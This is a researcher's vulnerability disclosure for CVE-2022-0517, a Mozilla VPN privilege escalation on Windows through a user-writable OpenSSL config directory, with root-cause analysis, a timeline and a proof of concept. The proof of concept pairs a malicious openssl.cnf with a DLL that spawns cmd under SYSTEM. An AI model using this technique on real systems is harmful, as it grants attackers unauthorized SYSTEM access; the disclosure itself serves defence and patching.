본문 바로가기
Real World Analysis/0-day

[0-Day] CVE-2022-0517 - Mozilla VPN Privilege Escalation Vulnerability

by l33d0hyun 2022. 4. 30.
Mozilla VPN

Title

  • Mozilla VPN Privilege Escalation Vulnerability

Summary

  • A Uncontrolled Search Path Element vulnerability exists in the libcrypto-1_1-x64.dll.
  • Attackers place arbitrarily generated openssl.cnf files in the C:\MozillaVPNBuild\SSL to exploit this vulnerability.

Security Severity

  • High

Root Cause Analysis

  • We can check the logic of loading the openssl.cnf file from the call stack above.
  • libcrypto-1_1-x64.dll CRYPTO_memcmp + 0x109195 => 0x1801a6eb5 libcrypto-1_1-x64.dll CRYPTO_memcmp + 0x3b9ce => 0x1800d96ee libcrypto-1_1-x64.dll CRYPTO_memcmp + 0x6f360 => 0x18010d080 libcrypto-1_1-x64.dll CRYPTO_memcmp + 0x7278a => 0x1801104aa
  • Check the OpenSSL_version_0 function.
  • const char *__fastcall OpenSSL_version_0(int a1) { const char *result; // rax switch ( a1 ) { case 0: result = "OpenSSL 1.1.1l 24 Aug 2021"; break; case 1: result = "compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DO" "PENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -" "DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_" "ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM"; break; case 2: result = "built on: Wed Nov 10 14:26:07 2021 UTC"; break; case 3: result = "platform: VC-WIN64A"; break; case 4: result = "OPENSSLDIR: \"C:\\MozillaVPNBuild\\SSL\""; break; case 5: result = "ENGINESDIR: \"C:\\MozillaVPNBuild\\lib\\engines-1_1\""; break; default: result = "not available"; break; } return result; }
  • If OPENSSLDIR is checked, the file openssl.cnf will be loaded from a directory that regular users have write access to. Because it runs on the VPN service, SYSTEM privileges are granted. One thing to note here is that the openssl.cnf file can load additional DLLs, leading to Privilege Escalation.

Proof-of-Concept

  • openssl.cnfpoc.c
  • #include <windows.h> void exploit() { system("cmd"); } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: exploit(); break; } return TRUE; }
  • # Malicious openssl.cnf openssl_conf = openssl_init [openssl_init] engines = engine_section [engine_section] cmd = cmd_section [cmd_section] engine_id = cmd dynamic_path = C:\\MozillaVPNBuild\\SSL\\poc.dll init = 0

CREDIT Information

  • DoHyun Lee (@l33d0hyun) of DNSLab, Korea University

Patch & Release

Timeline

  • 2022-01-27 : Vendor Report
  • 2022-01-31 : Vendor Assigned
  • 2022-02-02 : Vendor Investigated
  • 2022-02-16 : Fixed
  • 2022-02-22 : Bounty Accept
  • 2022-02-23 : Published

댓글